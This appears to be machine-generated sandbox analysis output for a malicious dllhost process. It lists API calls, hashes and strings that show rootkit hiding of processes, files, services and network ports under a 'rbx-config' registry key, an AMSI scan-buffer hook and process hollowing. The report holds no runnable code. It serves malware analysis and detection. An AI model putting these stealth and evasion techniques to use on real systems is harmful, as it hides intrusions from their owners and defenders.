                                            control_flow_graph 306 20175eef598-20175eef5b3 307 20175eef5b6-20175eef5df 306->307 308 20175eef5eb-20175eef5f4 307->308 309 20175eef5e1-20175eef5e6 307->309 311 20175eef60c 308->311 312 20175eef5f6-20175eef5f9 308->312 310 20175eef676-20175eef67f 309->310 310->307 313 20175eef685-20175eef69f 310->313 316 20175eef611-20175eef622 GetStdHandle 311->316 314 20175eef5fb-20175eef603 312->314 315 20175eef605-20175eef60a 312->315 314->316 315->316 317 20175eef624-20175eef62f GetFileType 316->317 318 20175eef651-20175eef669 316->318 317->318 319 20175eef631-20175eef63c 317->319 318->310 320 20175eef66b-20175eef66f 318->320 321 20175eef63e-20175eef643 319->321 322 20175eef645-20175eef648 319->322 320->310 321->310 322->310 323 20175eef64a-20175eef64f 322->323 323->310
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileHandleType
                                            • String ID:
                                            • API String ID: 3000768030-0
                                            • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                            • Instruction ID: b98c68d77c331fcd975fc70df693efe847ff76fe794ad7202922532bdd181eab
                                            • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                            • Instruction Fuzzy Hash: 3031A721620F4593F7608B149588269E650F34ABB0FA90709DB7A073F1CF75D972E380

                                            Control-flow Graph

                                            control_flow_graph 288 20175ebf598-20175ebf5b3 289 20175ebf5b6-20175ebf5df 288->289 290 20175ebf5eb-20175ebf5f4 289->290 291 20175ebf5e1-20175ebf5e6 289->291 293 20175ebf60c 290->293 294 20175ebf5f6-20175ebf5f9 290->294 292 20175ebf676-20175ebf67f 291->292 292->289 295 20175ebf685-20175ebf69f 292->295 298 20175ebf611-20175ebf622 GetStdHandle 293->298 296 20175ebf5fb-20175ebf603 294->296 297 20175ebf605-20175ebf60a 294->297 296->298 297->298 299 20175ebf651-20175ebf669 298->299 300 20175ebf624-20175ebf62f GetFileType 298->300 299->292 301 20175ebf66b-20175ebf66f 299->301 300->299 302 20175ebf631-20175ebf63c 300->302 301->292 303 20175ebf63e-20175ebf643 302->303 304 20175ebf645-20175ebf648 302->304 303->292 304->292 305 20175ebf64a-20175ebf64f 304->305 305->292
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileHandleType
                                            • String ID:
                                            • API String ID: 3000768030-0
                                            • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                            • Instruction ID: 5ac0b5db2e106014af088a0f8558a96400db709701796753d2045dc924ff8550
                                            • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                            • Instruction Fuzzy Hash: D531C532610B4491EB648F249598669E650F345BB1F68130ADF7A073F5CF75DAB2C390
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000003.2869389293.0000020175E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020175E80000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_3_20175e80000_dllhost.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction ID: 20dc4435e6be8510b26ba3ef72537591977d597bfe5a4796eed37c2b292ee29b
                                            • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction Fuzzy Hash: 4D912572B4135487EB648F25D808B6DF392FB48F98F5491249E4907BAADF78F922C700

                                            Control-flow Graph

                                            control_flow_graph 324 140002d38-140002d3c call 140002d4c 326 140002d41-140002d43 ExitProcess 324->326
                                            APIs
                                              • Part of subcall function 0000000140002D4C: OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
                                              • Part of subcall function 0000000140002D4C: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
                                              • Part of subcall function 0000000140002D4C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
                                              • Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
                                              • Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
                                              • Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
                                              • Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
                                              • Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
                                              • Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002E2A
                                              • Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
                                              • Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
                                              • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
                                              • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
                                              • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
                                              • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
                                              • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1
                                            • ExitProcess.KERNEL32 ref: 0000000140002D43
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                             • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Process$Open$HeapValue$CloseHandleQueryToken$AdjustAllocCurrentErrorExitLastLookupMutexPrivilegePrivilegesSleep
                                            • String ID:
                                            • API String ID: 3805535264-0
                                            • Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                            • Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
                                            • Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                            • Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                             • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
                                            • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                            • API String ID: 1036100660-1371749706
                                            • Opcode ID: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
                                            • Instruction ID: 2cc4599025b35cf826ffc418a6ccceb484f0f008c335a408c33283198f0c2c0b
                                            • Opcode Fuzzy Hash: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
                                            • Instruction Fuzzy Hash: DAD15DB6705A8187EB65CF63F84479AB7A0F788BC4F004025EB8A47BA4DF78D595CB04
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                             • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
                                            • Instruction ID: 9172d928bd221ff1096d4d6b158f49becdf828e9a984a0b33df103b3ad9988b4
                                            • Opcode Fuzzy Hash: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
                                            • Instruction Fuzzy Hash: 765138B2604B8086EB16DF62F4483AA77A1F79CBD9F444124EB4A07B78DF38C555C710
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction ID: 8c0e5deacabed4cf9c31043d7b341f9fac98672ffa78d73aeeecd7bfb5da8c22
                                            • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction Fuzzy Hash: 3FB1943222079882FB599F2AD808799E3A4F74CF84F545016DE4953BB6DFB5DEA0D340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                             • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                            • String ID:
                                            • API String ID: 4184240511-0
                                            • Opcode ID: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
                                            • Instruction ID: e7c2dfd052af18fd3abcefe0f72c8446b9113f84b0d7c840ae7e34f71e75c1d0
                                            • Opcode Fuzzy Hash: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
                                            • Instruction Fuzzy Hash: FF4146B2704A859AE711CF6AF8443DD63B1FB89B99F445225BF0A43A69DF38C159C304
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction ID: e58e53bb0560a1c61573d65839fddbd40403bd54cd326b9909f486fd1295493b
                                            • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction Fuzzy Hash: 73313E72215B8086FB608F64E8547EDB364F798744F44412ADA4E47BAAEFB8C758C710
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction ID: 128eb2a496c037ec8d177addb888730e817de25bc2eb69fe140a7b7d48984731
                                            • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction Fuzzy Hash: C9315E72205B80C6EB648F64E8547EEF3B4F784745F44402ADA4E47BAADFB8C658C710
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction ID: b0a4cca98dc60e5e70f03ad6866819465595d135fed29521f3a85077a481e3bc
                                            • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction Fuzzy Hash: 3E415336214F8086E760CF25E8447AEF7A4F788754F540216EB9D47BAADF78C665CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction ID: 8105350ced8ce2736936e32656651b93b31bc6a37a24404329990d8b1c7814ed
                                            • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction Fuzzy Hash: C4418236214F8086E760CF24E8447AEF3B4F788754F500116EA8D47BAADF78C665CB10
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID:
                                            • API String ID: 1164774033-0
                                            • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction ID: e74c786d4ee95284fa23afc9a9775dcd9a317430b91fb0f49741d3eee64eb5c4
                                            • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction Fuzzy Hash: 7EA1496272478049FBA09B75A6483ADFBA1E749794F0C4119DE482B6FADFB4C261E300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID:
                                            • API String ID: 1164774033-0
                                            • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction ID: 9eaf2f96a7b0a3d4526249e45f2313ed66fb5d25df799432807b650bfa54fd06
                                            • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction Fuzzy Hash: C2A16B6270478049FBA0DB75E688BADEBB1E741795F044115DE8827BBBCFB8C261C710

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                             • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                                            • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 3993315683-3414887735
                                            • Opcode ID: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
                                            • Instruction ID: 0bd1eed236b6321b202bdd9012a21668a5814f2879643e8febc2c05628ee43d5
                                            • Opcode Fuzzy Hash: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
                                            • Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 2135414181-3414887735
                                            • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction ID: 801eb5a93c501baf003ce120e766e2d95764ebfac4987a6c6fa33191ad0c8344
                                            • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction Fuzzy Hash: E3714D36320B5085FB509F61E85869CE3A5FB98B88F401122DE4D43B7ADF78C6A4D380
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 2135414181-3414887735
                                            • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction ID: f6e5124794b8ee4fbbc76abbf6521e170402c164b332a269bed817a14fe76b25
                                            • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction Fuzzy Hash: C1714D36310B5085EB109F61E859A9DF3B6FB88B99F402122DE4D83B3ADF74C664C390
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                            • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                            • API String ID: 1735320900-4225371247
                                            • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction ID: 5f2337ca99f6c51fad71cae724c93e68607f011ef58e23bb3a8b6f5e5f629ca4
                                            • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction Fuzzy Hash: 225179A0124B4AA5FB40EF64EC49BD8E321A758758F949917D40D025B7EFF9C3BAD380
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
